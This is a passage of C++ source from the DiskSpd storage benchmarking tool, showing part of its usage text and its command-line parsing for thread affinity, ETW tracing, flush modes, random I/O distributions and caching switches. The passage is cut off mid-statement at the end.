-n to disable default affinity]\n" " -ag#,#[,#,...]> advanced CPU affinity - affinitize threads round-robin to the CPUs provided. The g# notation\n" " specifies Processor Groups for the following CPU core #s. Multiple Processor Groups\n" " may be specified, and groups/cores may be repeated. If no group is specified, 0 is assumed.\n" " Additional groups/processors may be added, comma separated, or on separate parameters.\n" " Examples: -a0,1,2 and -ag0,0,1,2 are equivalent.\n" " -ag0,0,1,2,g1,0,1,2 specifies the first three cores in groups 0 and 1.\n" " -ag0,0,1,2 -ag1,0,1,2 is equivalent.\n" " -b<size>[KMGT] block size in bytes or KiB/MiB/GiB/TiB [default=64K]\n" " -B<offs>[KMGTb] base target offset in bytes or KiB/MiB/GiB/TiB/blocks [default=0]\n" " (offset from the beginning of the file)\n" " -c<size>[KMGTb] create files of the given size.\n" " Size can be stated in bytes or KiB/MiB/GiB/TiB/blocks\n" " -C<seconds> cool down time - duration of the test after measurements finished [default=0s].\n" " -D<milliseconds> Capture IOPs statistics in intervals of <milliseconds>; these are per-thread\n" " per-target: text output provides IOPs standard deviation, XML provides the full\n" " IOPs time series in addition. [default=1000, 1 second].\n" " -d<seconds> duration (in seconds) to run test [default=10s]\n" " -f<size>[KMGTb] target size - use only the first <size> bytes or KiB/MiB/GiB/TiB/blocks of the file/disk/partition,\n" " for example to test only the first sectors of a disk\n" " -f<rst> open file with one or more additional access hints\n" " r : the FILE_FLAG_RANDOM_ACCESS hint\n" " s : the FILE_FLAG_SEQUENTIAL_SCAN hint\n" " t : the FILE_ATTRIBUTE_TEMPORARY hint\n" " [default: none]\n" " -F<count> total number of threads (conflicts with -t)\n" " -g<value>[i] throughput per-thread per-target throttled to given value; defaults to bytes per millisecond\n" " With the optional i qualifier the value is IOPS of the specified block size (-b).\n" " Throughput limits cannot be specified when using completion routines (-x)\n" " [default: no limit]\n" " -h deprecated, see -Sh\n" " -i<count> number of IOs per burst; see -j [default: inactive]\n" " -j<milliseconds> interval in <milliseconds> between issuing IO bursts; see -i [default: inactive]\n" " -I<priority> Set IO priority to <priority>. Available values are: 1-very low, 2-low, 3-normal (default)\n" " -l Use large pages for IO buffers\n" " -L measure latency statistics\n" " -n disable default affinity (-a)\n" " -N<vni> specify the flush mode for memory mapped I/O\n" " v : uses the FlushViewOfFile API\n" " n : uses the RtlFlushNonVolatileMemory API\n" " i : uses RtlFlushNonVolatileMemory without waiting for the flush to drain\n" " [default: none]\n" " -o<count> number of outstanding I/O requests per target per thread\n" " (1=synchronous I/O, unless more than 1 thread is specified with -F)\n" " [default=2]\n" " -O<count> number of outstanding I/O requests per thread - for use with -F\n" " (1=synchronous I/O)\n" " -p start parallel sequential I/O operations with the same offset\n" " (ignored if -r is specified, makes sense only with -o2 or greater)\n" " -P<count> enable printing a progress dot after each <count> [default=65536]\n" " completed I/O operations, counted separately by each thread \n" " -r[align[KMGTb]] random I/O aligned to <align> in bytes/KiB/MiB/GiB/TiB/blocks (overrides -s)\n" " [default alignment=block size (-b)]\n" " -rd<dist>[params] specify an non-uniform distribution for random IO in the target\n" " [default uniformly random]\n" " distributions: pct, abs\n" " all: IO%% and %%Target/Size are cumulative. If the sum of IO%% is less than 100%% the\n" " remainder is applied to the remainder of the target. An IO%% of 0 indicates a gap -\n" " no IO will be issued to that range of the target.\n" " pct : parameter is a combination of IO%%/%%Target separated by : (colon)\n" " Example: -rdpct90/10:0/10:5/20 specifies 90%% of IO in 10%% of the target, no IO\n" " next 10%%, 5%% IO in the next 20%% and the remaining 5%% of IO in the last 60%%\n" " abs : parameter is a combination of IO%%/Target Size separated by : (colon)\n" " If the actual target size is smaller than the distribution, the relative values of IO%%\n" " for the valid elements define the effective distribution.\n" " Example: -rdabs90/10G:0/10G:5/20G specifies 90%% of IO in 10GiB of the target, no IO\n" " next 10GiB, 5%% IO in the next 20GiB and the remaining 5%% of IO in the remaining\n" " capacity of the target. If the target is only 20G, the distribution truncates at\n" " 90/10G:0:10G and all IO is directed to the first 10G (equivalent to -f10G).\n" " -rs<percentage> percentage of requests which should be issued randomly. When used, -r may be used to\n" " specify IO alignment (applies to both the random and sequential portions of the load).\n" " Sequential IO runs will be homogeneous if a mixed ratio is specified (-w), and run\n" " lengths will follow a geometric distribution based on the percentage split.\n" " -R[p]<text|xml> output format. With the p prefix, the input profile (command line or XML) is validated and\n" " re-output in the specified format without running load, useful for checking or building\n" " complex profiles.\n" " [default: text]\n" " -s[i][align[KMGTb]] stride size of <align> in bytes/KiB/MiB/GiB/TiB/blocks, alignment/offset between operations\n" " [default=non-interlocked, default alignment=block size (-b)]\n" " By default threads track independent sequential IO offsets starting at offset 0 of the target.\n" " With multiple threads this results in threads overlapping their IOs - see -T to divide\n" " them into multiple separate sequential streams on the target.\n" " With the optional i qualifier (-si) threads interlock on a shared sequential offset.\n" " Interlocked operations may introduce overhead but make it possible to issue a single\n" " sequential stream to a target which responds faster than a one thread can drive.\n" " (ignored if -r specified, -si conflicts with -p, -rs and -T)\n" " -S[bhmruw] control caching behavior [default: caching is enabled, no writethrough]\n" " non-conflicting flags may be combined in any order; ex: -Sbw, -Suw, -Swu\n" " -S equivalent to -Su\n" " -Sb enable caching (default, explicitly stated)\n" " -Sh equivalent -Suw\n" " -Sm enable memory mapped I/O\n" " -Su disable software caching, equivalent to FILE_FLAG_NO_BUFFERING\n" " -Sr disable local caching, with remote sw caching enabled; only valid for remote filesystems\n" " -Sw enable writethrough (no hardware write caching), equivalent to FILE_FLAG_WRITE_THROUGH or\n" " non-temporal writes for memory mapped I/O (-Sm)\n" " -t<count> number of threads per target (conflicts with -F)\n" " -T<offs>[KMGTb] starting stride between I/O operations performed on the same target by different threads\n" " [default=0] (starting offset = base file offset + (thread number * <offs>)\n" " only applies with #threads > 1\n" " -v verbose mode\n" " -w<percentage> percentage of write requests (-w and -w0 are equivalent and result in a read-only workload).\n" " absence of this switch indicates 100%% reads\n" " IMPORTANT: a write test will destroy existing data without a warning\n" " -W<seconds> warm up time - duration of the test before measurements start [default=5s]\n" " -x use completion routines instead of I/O Completion Ports\n" " -X<filepath> use an XML file to configure the workload. Combine with -R, -v and -z to override profile defaults.\n" " Targets can be defined in XML profiles as template paths of the form *<integer> (*1, *2, ...).\n" " When run, specify the paths to substitute for the template paths in order on the command line.\n" " The first specified target is *1, second is *2, and so on.\n" " Example: diskspd -Xprof.xml first.bin second.bin (prof.xml using *1 and *2)\n" " -z[seed] set random seed [with no -z, seed=0; with plain -z, seed is based on system run time]\n" "\n" "Write buffers:\n" " -Z zero buffers used for write tests\n" " -Zr per IO random buffers used for write tests - this incurrs additional run-time\n" " overhead to create random content and shouln't be compared to results run\n" " without -Zr\n" " -Z<size>[KMGb] use a <size> buffer filled with random data as a source for write operations.\n" " -Z<size>[KMGb],<file> use a <size> buffer filled with data from <file> as a source for write operations.\n" "\n" " By default, the write buffers are filled with a repeating pattern (0, 1, 2, ..., 255, 0, 1, ...)\n" "\n" "Synchronization:\n" " -ys<eventname> signals event <eventname> before starting the actual run (no warmup)\n" " (creates a notification event if <eventname> does not exist)\n" " -yf<eventname> signals event <eventname> after the actual run finishes (no cooldown)\n" " (creates a notification event if <eventname> does not exist)\n" " -yr<eventname> waits on event <eventname> before starting the run (including warmup)\n" " (creates a notification event if <eventname> does not exist)\n" " -yp<eventname> stops the run when event <eventname> is set; CTRL+C is bound to this event\n" " (creates a notification event if <eventname> does not exist)\n" " -ye<eventname> sets event <eventname> and quits\n" "\n" "Event Tracing:\n" " -e<q|c|s> Use query perf timer (qpc), cycle count, or system timer respectively.\n" " [default = q, query perf timer (qpc)]\n" " -ep use paged memory for the NT Kernel Logger [default=non-paged memory]\n" " -ePROCESS process start & end\n" " -eTHREAD thread start & end\n" " -eIMAGE_LOAD image load\n" " -eDISK_IO physical disk IO\n" " -eMEMORY_PAGE_FAULTS all page faults\n" " -eMEMORY_HARD_FAULTS hard faults only\n" " -eNETWORK TCP/IP, UDP/IP send & receive\n" " -eREGISTRY registry calls\n" "\n\n"); printf("Examples:\n\n"); printf("Create 8192KB file and run read test on it for 1 second:\n\n"); printf(" %s -c8192K -d1 testfile.dat\n", pszFilename); printf("\n"); printf("Set block size to 4KB, create 2 threads per file, 32 overlapped (outstanding)\n"); printf("I/O operations per thread, disable all caching mechanisms and run block-aligned random\n"); printf("access read test lasting 10 seconds:\n\n"); printf(" %s -b4K -t2 -r -o32 -d10 -Sh testfile.dat\n\n", pszFilename); printf("Create two 1GB files, set block size to 4KB, create 2 threads per file, affinitize threads\n"); printf("to CPUs 0 and 1 (each file will have threads affinitized to both CPUs) and run read test\n"); printf("lasting 10 seconds:\n\n"); printf(" %s -c1G -b4K -t2 -d10 -a0,1 testfile1.dat testfile2.dat\n", pszFilename); printf("\n"); } bool CmdLineParser::_ParseETWParameter(const char *arg, Profile *pProfile) { assert(nullptr != arg); assert(0 != *arg); bool fOk = true; pProfile->SetEtwEnabled(true); if (*(arg + 1) != '\0') { const char *c = arg + 1; if (*c == 'p') { pProfile->SetEtwUsePagedMemory(true); } else if (*c == 'q') { pProfile->SetEtwUsePerfTimer(true); } else if (*c == 's') { pProfile->SetEtwUseSystemTimer(true); //default } else if (*c == 'c') { pProfile->SetEtwUseCyclesCounter(true); } else if (strcmp(c, "PROCESS") == 0) //process start & end { pProfile->SetEtwProcess(true); } else if (strcmp(c, "THREAD") == 0) //thread start & end { pProfile->SetEtwThread(true); } else if (strcmp(c, "IMAGE_LOAD") == 0) //image load { pProfile->SetEtwImageLoad(true); } else if (strcmp(c, "DISK_IO") == 0) //physical disk IO { pProfile->SetEtwDiskIO(true); } else if (strcmp(c, "MEMORY_PAGE_FAULTS") == 0) //all page faults { pProfile->SetEtwMemoryPageFaults(true); } else if (strcmp(c, "MEMORY_HARD_FAULTS") == 0) //hard faults only { pProfile->SetEtwMemoryHardFaults(true); } else if (strcmp(c, "NETWORK") == 0) //tcpip send & receive { pProfile->SetEtwNetwork(true); } else if (strcmp(c, "REGISTRY") == 0) //registry calls { pProfile->SetEtwRegistry(true); } else { fOk = false; } } else { fOk = false; } return fOk; } bool CmdLineParser::_ParseAffinity(const char *arg, TimeSpan *pTimeSpan) { bool fOk = true; assert(nullptr != arg); assert('\0' != *arg); const char *c = arg + 1; // -a and -ag are functionally equivalent; group-aware affinity. // Note that group-aware affinity is default. // look for the -a simple case if (*c == '\0') { return true; } // look for the -ag simple case if (*c == 'g') { // peek ahead, done? if (*(c + 1) == '\0') { return true; } // leave the parser at the g; this is the start of a group number } // more complex affinity -ag0,0,1,2,g1,0,1,2,... OR -a0,1,2,.. // n counts the -a prefix, the first parsed character is string index 2 DWORD nGroup = 0, nNum = 0, n = 2; bool fGroup = false, fNum = false; while (*c != '\0') { if ((*c >= '0') && (*c <= '9')) { // accumulating a number fNum = true; nNum = 10 * nNum + (*c - '0'); } else if (*c == 'g') { // bad: ggggg if (fGroup) { fOk = false; } // now parsing a group number fGroup = true; } else if (*c == ',') { // separator; if parsing group and have a number, now have the group if (fGroup && fNum) { if (nNum > MAXWORD) { fprintf(stderr, "ERROR: group %u is out of range\n", nNum); fOk = false; } else { nGroup = nNum; nNum = 0; fGroup = false; } } // at a split but don't have a parsed number, error else if (!fNum) { fOk = false; } // have a parsed core number else { if (nNum > MAXBYTE) { fprintf(stderr, "ERROR: core %u is out of range\n", nNum); fOk = false; } else { pTimeSpan->AddAffinityAssignment((WORD)nGroup, (BYTE)nNum); nNum = 0; fNum = false; } } } else { fOk = false; } // bail out to error pretty print on error if (!fOk) { break; } c++; n++; } // if parsing a group or don't have a final number, error if (fGroup || !fNum) { fOk = false; } if (fOk && nNum > MAXBYTE) { fprintf(stderr, "ERROR: core %u is out of range\n", nNum); fOk = false; } if (!fOk) { // mid-parse error, show the point at which it occured if (*c != '\0') { fprintf(stderr, "ERROR: syntax error parsing affinity at highlighted character\n-%s\n", arg); while (n-- > 0) { fprintf(stderr, " "); } fprintf(stderr, "^\n"); } else { fprintf(stderr, "ERROR: incomplete affinity specification\n"); } } if (fOk) { // fprintf(stderr, "FINAL parsed group %d core %d\n", nGroup, nNum); pTimeSpan->AddAffinityAssignment((WORD)nGroup, (BYTE)nNum); } return fOk; } bool CmdLineParser::_ParseFlushParameter(const char *arg, MemoryMappedIoFlushMode *FlushMode) { assert(nullptr != arg); assert(0 != *arg); bool fOk = true; if (*(arg + 1) != '\0') { const char *c = arg + 1; if (_stricmp(c, "v") == 0) { *FlushMode = MemoryMappedIoFlushMode::ViewOfFile; } else if (_stricmp(c, "n") == 0) { *FlushMode = MemoryMappedIoFlushMode::NonVolatileMemory; } else if (_stricmp(c, "i") == 0) { *FlushMode = MemoryMappedIoFlushMode::NonVolatileMemoryNoDrain; } else { fOk = false; } } else { fOk = false; } return fOk; } bool CmdLineParser::_ParseRandomDistribution(const char *arg, vector<Target>& vTargets) { vector<DistributionRange> vOr; DistributionType dType; bool fOk = false; UINT32 pctAcc = 0, pctCur; // accumulated/cur pct io UINT64 targetAcc = 0, targetCur; // accumulated/cur target if (!strncmp(arg, "pct", 3)) { dType = DistributionType::Percent; } else if (strncmp(arg, "abs", 3)) { fprintf(stderr, "Unrecognized random distribution type\n"); return false; } else { dType = DistributionType::Absolute; } arg += 3; // // Parse pairs of // // * pct: percentage/target percentage // * abs: percentage/absolute range of target // // Ex: 90/10:5/5 => [0,90) -> [0, 10) :: [90, 95) -> [10, 15) // a remainder of [95, 100) -> [15, 100) would be applied. // // Percentages are cumulative and successively define the span of // the preceding definition. Absolute ranges are also cumulative: // 10/1G:90/1G puts 90% of accesses in the second 1G range of the // target. // // A single percentage can be 100 but is of limited value since it // would only be valid as a single element distribution. // // Basic numeric validations are done here (similar to XSD for XML). // Cross validation with other workload parameters (blocksize) and whole // distribution validation is delayed to common code. // while (true) { // Consume IO% integer fOk = Util::ParseUInt(arg, pctCur, arg); if (!fOk) { fprintf(stderr, "Invalid integer IO%%: must be > 0 and <= %u\n", 100 - pctAcc); return false; } // hole is ok else if (pctCur > 100) { fprintf(stderr, "Invalid IO%% %u: must be >= 0 and <= %u\n", pctCur, 100 - pctAcc); return false; } // Expect separator if (*arg++ != '/') { fprintf(stderr, "Expected / separator after %u\n", pctCur); return false; } // Consume Target%/Absolute range integer if (dType == DistributionType::Percent) { // Percent specification fOk = Util::ParseUInt(arg, targetCur, arg); if (!fOk) { fprintf(stderr, "Invalid integer Target%%: must be > 0 and <= %I64u\n", 100 - targetAcc); return false; } // no hole else if (targetCur == 0 || targetCur > 100) { fprintf(stderr, "Invalid Target%% %I64u: must be > 0 and <= %I64u\n", targetCur, 100 - targetAcc); return false; } } else { // Size specification fOk = CmdLineParser::_GetSizeInBytes(arg, targetCur, &arg); if (!fOk) { // error already emitted return fOk; } if (targetCur == 0) { fprintf(stderr, "Invalid zero length target range\n"); return false; } } // Add range from [accumulator - accumulator + current) => ... // Note that zero pctCur indicates a hole where no IO is desired - this is recorded // for fidelity of display/profile but will never match on lookup, as intended. vOr.emplace_back(pctAcc, pctCur, make_pair(targetAcc, targetCur)); // Now move accumulators for the next tuple/completion pctAcc += pctCur; targetAcc += targetCur; // Expect/consume separator for next tuple? if (*arg == ':') { ++arg; continue; } // Done? if (*arg == '\0') { break; } fprintf(stderr, "Unexpected characters in specification '%s'\n", arg); return false; } // Apply to all targets for (auto& t : vTargets) { t.SetDistributionRange(vOr, dType); } return true; } bool CmdLineParser::_ReadParametersFromCmdLine(const int argc, const char *argv[], Profile *pProfile, struct Synchronization *synch, bool& fXMLProfile) { int nParamCnt = argc - 1; const char** args = argv + 1; bool fError = false; TimeSpan timeSpan; // // Pass 1 - determine parameter set type: cmdline specification or XML, and preparse targets/blocksize // ParseState isXMLSet = ParseState::Unknown; ParseState isXMLResultFormat = ParseState::Unknown; ParseState isProfileOnly = ParseState::Unknown; ParseState isVerbose = ParseState::Unknown; ParseState isRandomSeed = ParseState::Unknown; ParseState isWarmupTime = ParseState::Unknown; ParseState isDurationTime = ParseState::Unknown; ParseState isCooldownTime = ParseState::Unknown; ULONG randomSeedValue = 0; ULONG warmupTime = 0; ULONG durationTime = 0; ULONG cooldownTime = 0; const char *xmlProfile = nullptr; // // Find all target specifications. Note that this assumes all non-target // parameters are single tokens; e.g. "-Hsomevalue" and never "-H somevalue". // Targets follow parameter specifications. // vector<Target> vTargets; for (int i = 0, inTargets = false; i < nParamCnt; ++i) { if (!_IsSwitchChar(args[i][0])) { inTargets = true; Target target; target.SetPath(args[i]); vTargets.push_back(target); } else if (inTargets) { fprintf(stderr, "ERROR: parameters (%s) must come before targets on the command line\n", args[i]); return false; } } // // Find composable and dependent parameters as we resolve the parameter set. // for (int i = 0; i < nParamCnt; ++i) { if (_IsSwitchChar(args[i][0])) { const char *arg = &args[i][2]; switch(args[i][1]) { case 'b': // Block size does not compose with XML profile spec if (isXMLSet == ParseState::True) { fprintf(stderr, "ERROR: -b is not compatible with -X XML profile specification\n"); return false; } else { UINT64 ullBlockSize; if (_GetSizeInBytes(arg, ullBlockSize, nullptr) && ullBlockSize < MAXUINT32) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetBlockSizeInBytes((DWORD)ullBlockSize); } } else { fprintf(stderr, "ERROR: invalid block size passed to -b\n"); return false; } _dwBlockSize = (DWORD)ullBlockSize; isXMLSet = ParseState::False; } break; case 'C': { int c = atoi(arg); if (c >= 0) { cooldownTime = c; isCooldownTime = ParseState::True; } else { fprintf(stderr, "ERROR: invalid cooldown time (-C): '%s'\n", arg); return false; } } break; case 'd': { int c = atoi(arg); if (c >= 0) { durationTime = c; isDurationTime = ParseState::True; } else { fprintf(stderr, "ERROR: invalid measured duration time (-d): '%s'\n", arg); return false; } } break; case 'W': { int c = atoi(arg); if (c >= 0) { warmupTime = c; isWarmupTime = ParseState::True; } else { fprintf(stderr, "ERROR: invalid warmup time (-W): '%s'\n", arg); return false; } } break; case 'R': // re-output profile only (no run) if ('p' == *arg) { isProfileOnly = ParseState::True; ++arg; } if ('\0' != *arg) { // Explicit results format if (strcmp(arg, "xml") == 0) { isXMLResultFormat = ParseState::True; } else if (strcmp(arg, "text") != 0) { fprintf(stderr, "ERROR: invalid results format (-R): '%s'\n", arg); return false; } else { isXMLResultFormat = ParseState::False; } } else { // allow for -Rp shorthand for default profile-only format if (isProfileOnly != ParseState::True) { fprintf(stderr, "ERROR: unspecified results format -R: use [p]<text|xml>\n"); return false; } } break; case 'v': isVerbose = ParseState::True; break; case 'X': if (isXMLSet == ParseState::Unknown) { isXMLSet = ParseState::True; } else { fprintf(stderr, "ERROR: multiple XML profiles specified (-X)\n"); return false; } xmlProfile = arg; break; case 'z': { char *endPtr = nullptr; if (*arg == '\0') { randomSeedValue = (ULONG) GetTickCount64(); } else { randomSeedValue = strtoul(arg, &endPtr, 10); if (*endPtr != '\0') { fprintf(stderr, "ERROR: invalid random seed value '%s' specified - must be a valid 32 bit integer\n", arg); return false; } } isRandomSeed = ParseState::True; } break; default: // no other switches are valid in combination with -X // if we've seen X, this means it is bad // if not, we know it will not be X if (isXMLSet == ParseState::True) { fprintf(stderr, "ERROR: invalid XML profile specification; parameter %s not compatible with -X\n", args[i]); return false; } else { isXMLSet = ParseState::False; } } } } // XML profile? if (isXMLSet == ParseState::True) { if (!_ReadParametersFromXmlFile(xmlProfile, pProfile, &vTargets)) { return false; } } // // Apply profile common parameters - note that results format is unmodified if R not explicitly provided // if (isXMLResultFormat == ParseState::True) { pProfile->SetResultsFormat(ResultsFormat::Xml); } else if (isXMLResultFormat == ParseState::False) { pProfile->SetResultsFormat(ResultsFormat::Text); } if (isProfileOnly == ParseState::True) { pProfile->SetProfileOnly(true); } if (isVerbose == ParseState::True) { pProfile->SetVerbose(true); } // // Apply timespan common composable parameters // if (isXMLSet == ParseState::True) { for (auto& ts : const_cast<vector<TimeSpan> &>(pProfile->GetTimeSpans())) { if (isRandomSeed == ParseState::True) { ts.SetRandSeed(randomSeedValue); } if (isWarmupTime == ParseState::True) { ts.SetWarmup(warmupTime); } if (isDurationTime == ParseState::True) { ts.SetDuration(durationTime); } if (isCooldownTime == ParseState::True) { ts.SetCooldown(cooldownTime); } } } else { if (isRandomSeed == ParseState::True) { timeSpan.SetRandSeed(randomSeedValue); } if (isWarmupTime == ParseState::True) { timeSpan.SetWarmup(warmupTime); } if (isDurationTime == ParseState::True) { timeSpan.SetDuration(durationTime); } if (isCooldownTime == ParseState::True) { timeSpan.SetCooldown(cooldownTime); } } // Now done if XML profile if (isXMLSet == ParseState::True) { fXMLProfile = true; return true; } // // Parse full command line for profile // // initial parse for cache/writethrough // these are built up across the entire cmd line and applied at the end. // this allows for conflicts to be thrown for mixed -h/-S as needed. TargetCacheMode t = TargetCacheMode::Undefined; WriteThroughMode w = WriteThroughMode::Undefined; MemoryMappedIoMode m = MemoryMappedIoMode::Undefined; MemoryMappedIoFlushMode f = MemoryMappedIoFlushMode::Undefined; bool bExit = false; while (nParamCnt) { const char* arg = *args; const char* const carg = arg; // save for error reporting, arg is modified during parse // Targets follow parameters on command line. If this is a target, we are done now. if (!_IsSwitchChar(*arg)) { break; } // skip switch character, provide length ++arg; const size_t argLen = strlen(arg); switch (*arg) { case '?': _DisplayUsageInfo(argv[0]); exit(0); case 'a': //affinity //-a1,2,3,4 (assign threads to cpus 1,2,3,4 (round robin)) if (!_ParseAffinity(arg, &timeSpan)) { fError = true; } break; case 'b': //block size // nop - block size has been taken care of before the loop break; case 'B': //base file offset (offset from the beginning of the file) if (*(arg + 1) != '\0') { UINT64 cb; if (_GetSizeInBytes(arg + 1, cb, nullptr)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetBaseFileOffsetInBytes(cb); } } else { fprintf(stderr, "ERROR: invalid base file offset passed to -B\n"); fError = true; } } else { fError = true; } break; case 'c': //create file of the given size if (*(arg + 1) != '\0') { UINT64 cb; if (_GetSizeInBytes(arg + 1, cb, nullptr)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetFileSize(cb); i->SetCreateFile(true); } } else { fprintf(stderr, "ERROR: invalid file size passed to -c\n"); fError = true; } } else { fError = true; } break; case 'C': //cool down time - pass 1 composable break; case 'd': //duration - pass 1 composable break; case 'D': //standard deviation { timeSpan.SetCalculateIopsStdDev(true); int x = atoi(arg + 1); if (x > 0) { timeSpan.SetIoBucketDurationInMilliseconds(x); } } break; case 'e': //etw if (!_ParseETWParameter(arg, pProfile)) { fError = true; } break; case 'f': if (isdigit(*(arg + 1))) { UINT64 cb; if (_GetSizeInBytes(arg + 1, cb, nullptr)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetMaxFileSize(cb); } } else { fprintf(stderr, "ERROR: invalid max file size passed to -f\n"); fError = true; } } else { if ('\0' == *(arg + 1)) { fError = true; } else { // while -frs (or -fsr) are generally conflicting intentions as far as // the OS is concerned, do not enforce while (*(++arg) != '\0') { switch (*arg) { case 'r': for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetRandomAccessHint(true); } break; case 's': for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetSequentialScanHint(true); } break; case 't': for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetTemporaryFileHint(true); } break; default: fError = true; break; } } } } break; case 'F': //total number of threads { int c = atoi(arg + 1); if (c > 0) { timeSpan.SetThreadCount(c); } else { fError = true; } } break; case 'g': //throughput in bytes per millisecond (gNNN) OR iops (gNNNi) { // units? bool isBpms = false; if (isdigit(arg[argLen - 1])) { isBpms = true; } else if (arg[argLen - 1] != 'i') { // not IOPS, so its bad fError = true; } if (!fError) { int c = atoi(arg + 1); if (c > 0) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { if (isBpms) { i->SetThroughput(c); } else { i->SetThroughputIOPS(c); } } } else { fError = true; } } } break; case 'h': // compat: disable os cache and set writethrough; now equivalent to -Sh if (t == TargetCacheMode::Undefined && w == WriteThroughMode::Undefined) { t = TargetCacheMode::DisableOSCache; w = WriteThroughMode::On; } else { fprintf(stderr, "ERROR: -h conflicts with earlier specification of cache/writethrough\n"); fError = true; } break; case 'i': //number of IOs to issue before think time { int c = atoi(arg + 1); if (c > 0) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetBurstSize(c); i->SetUseBurstSize(true); } } else { fError = true; } } break; case 'j': //time to wait between bursts of IOs { int c = atoi(arg + 1); if (c > 0) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetThinkTime(c); i->SetEnableThinkTime(true); } } else { fError = true; } } break; case 'I': //io priority { int x = atoi(arg + 1); if (x > 0 && x < 4) { PRIORITY_HINT hint[] = { IoPriorityHintVeryLow, IoPriorityHintLow, IoPriorityHintNormal }; for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetIOPriorityHint(hint[x - 1]); } } else { fError = true; } } break; case 'l': //large pages for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetUseLargePages(true); } break; case 'L': //measure latency timeSpan.SetMeasureLatency(true); break; case 'n': //disable affinity (by default simple affinity is turned on) timeSpan.SetDisableAffinity(true); break; case 'N': if (!_ParseFlushParameter(arg, &f)) { fError = true; } break; case 'o': //request count (1==synchronous) { int c = atoi(arg + 1); if (c > 0) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetRequestCount(c); } } else { fError = true; } } break; case 'O': //total number of IOs/thread - for use with -F { int c = atoi(arg + 1); if (c > 0) { timeSpan.SetRequestCount(c); } else { fError = true; } } break; case 'p': //start async IO operations with the same offset //makes sense only for -o2 and greater for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetUseParallelAsyncIO(true); } break; case 'P': //show progress every x IO operations { int c = atoi(arg + 1); if (c < 1) { c = 65536; } pProfile->SetProgress(c); } break; case 'r': //random access { // mixed random/sequential pct split? if (*(arg + 1) == 's') { int c = 0; ++arg; if (*(arg + 1) == '\0') { fprintf(stderr, "ERROR: no random percentage passed to -rs\n"); fError = true; } else { c = atoi(arg + 1); if (c <= 0 || c > 100) { fprintf(stderr, "ERROR: random percentage passed to -rs should be between 1 and 100\n"); fError = true; } } if (!fError) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { // if random ratio is unset and actual alignment is already specified, // -s was used: don't allow this for clarity of intent if (!i->GetRandomRatio() && i->GetBlockAlignmentInBytes(true)) { fprintf(stderr, "ERROR: use -r to specify IO alignment when using mixed random/sequential IO (-rs)\n"); fError = true; break; } // if random ratio was already set to something other than 100% (-r) // then -rs was specified multiple times: catch and block this if (i->GetRandomRatio() && i->GetRandomRatio() != 100) { fprintf(stderr, "ERROR: mixed random/sequential IO (-rs) specified multiple times\n"); fError = true; break; } // Note that -rs100 is the same as -r. It will not result in the <RandomRatio> element // in the XML profile; we will still only emit/accept 1-99 there. // // Saying -rs0 (sequential) would create an ambiguity between that and -r[nnn]. Rather // than bend the intepretation of -r[nnn] for the special case of -rs0 we will error // it out in the bounds check above. i->SetRandomRatio(c); } } } // random distribution else if (*(arg + 1) == 'd') { // advance past the d arg += 2; fError = !_ParseRandomDistribution(arg, vTargets); } // random block alignment // if mixed random/sequential not already specified, set to 100% else { UINT64 cb = _dwBlockSize; if (*(arg + 1) != '\0') { if (!_GetSizeInBytes(arg + 1, cb, nullptr) || (cb == 0)) { fprintf(stderr, "ERROR: invalid alignment passed to -r\n"); fError = true; } } if (!fError) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { // Do not override -rs specification if (!i->GetRandomRatio()) { i->SetRandomRatio(100); } // Multiple -rNN? // Note that -rs100 -r[NN] will pass since -rs does not set alignment. // We are only validating a single -rNN specification. else if (i->GetRandomRatio() == 100 && i->GetBlockAlignmentInBytes(true)) { fprintf(stderr, "ERROR: random IO (-r) specified multiple times\n"); fError = true; break; } // -s already set the alignment? if (i->GetBlockAlignmentInBytes(true)) { fprintf(stderr, "ERROR: sequential IO (-s) conflicts with random IO (-r/-rs)\n"); fError = true; break; } i->SetBlockAlignmentInBytes(cb); } } } } break; case 'R': // output profile/results format engine - handled in pass 1 break; case 's': //stride size { int idx = 1; if ('i' == *(arg + idx)) { // do interlocked sequential mode // ISSUE-REVIEW: this does nothing if -r is specified // ISSUE-REVIEW: this does nothing if -p is specified // ISSUE-REVIEW: this does nothing if we are single-threaded for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetUseInterlockedSequential(true); } idx++; } for (auto i = vTargets.begin(); i != vTargets.end(); i++) { // conflict -s with -rs/-s if (i->GetRandomRatio()) { if (i->GetRandomRatio() == 100) { fprintf(stderr, "ERROR: sequential IO (-s) conflicts with random IO (-r/-rs)\n"); } else { fprintf(stderr, "ERROR: use -r to specify IO alignment for -rs\n"); } fError = true; break; } // conflict with multiple -s if (i->GetBlockAlignmentInBytes(true)) { fprintf(stderr, "ERROR: sequential IO (-s) specified multiple times\n"); fError = true; break; } } if (*(arg + idx) != '\0') { UINT64 cb; // Note that we allow -s0, as unusual as that would be. // The counter-case of -r0 is invalid and checked for. if (_GetSizeInBytes(arg + idx, cb, nullptr)) { for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetBlockAlignmentInBytes(cb); } } else { fprintf(stderr, "ERROR: invalid stride size passed to -s\n"); fError = true; } } else { // explicitly pass through the block size so that we can detect // -rs/-s intent conflicts when attempting to set -rs for (auto i = vTargets.begin(); i != vTargets.end(); i++) { i->SetBlockAlignmentInBytes(i->GetBlockSizeInBytes()); } } } break; case 'S': //control os/hw/remote caching and writethrough { // parse flags - it is an error to multiply specify either property, which // can be detected simply by checking if we move one from !undefined. // this also handles conflict cases. int idx; for (idx = 1; !fError && *(arg + idx) != '\0'; idx++) { switch (*(arg + idx)) { case 'b': if (t == TargetCacheMode::Undefined) { t = TargetCacheMode::Cached; } else { fprintf(stderr, "ERROR: -Sb conflicts with earlier specification of cache mode\n"); fError = 